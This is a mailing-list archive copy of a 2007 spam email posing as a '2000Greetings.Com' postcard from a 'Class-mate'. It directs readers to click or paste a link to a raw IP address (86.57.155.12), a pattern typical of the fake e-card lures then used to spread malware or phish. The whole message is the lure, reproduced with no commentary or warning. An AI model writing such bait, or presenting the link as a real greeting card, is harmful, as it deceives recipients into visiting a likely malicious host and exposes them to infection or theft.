www-repository mailing list archives

From "2000Greetings.Com" <zi...@amat.com>
Subject You've received a postcard from a Class-mate!
Date Fri, 06 Jul 2007 17:05:04 GMT
Hi. Class-mate has sent you a postcard.
See your card as often as you wish during the next 15 days.

SEEING YOUR CARD

If your email software creates links to Web pages, click on your
card's direct www address below while you are connected to the Internet:

http://86.57.155.12/?46921636c804814655dc21c83715e8517a

Or copy and paste it into your browser's "Location" box (where Internet
addresses go).

PRIVACY
2000Greetings.Com honors your privacy. Our home page and Card Pick Up have links to our
Privacy Policy.

TERMS OF USE
By accessing your card you agree we have no liability.
If you don't know the person sending the card or don't wish to see the card,
please disregard this Announcement.

We hope you enjoy your awesome card.

Wishing you the best,
Postmaster,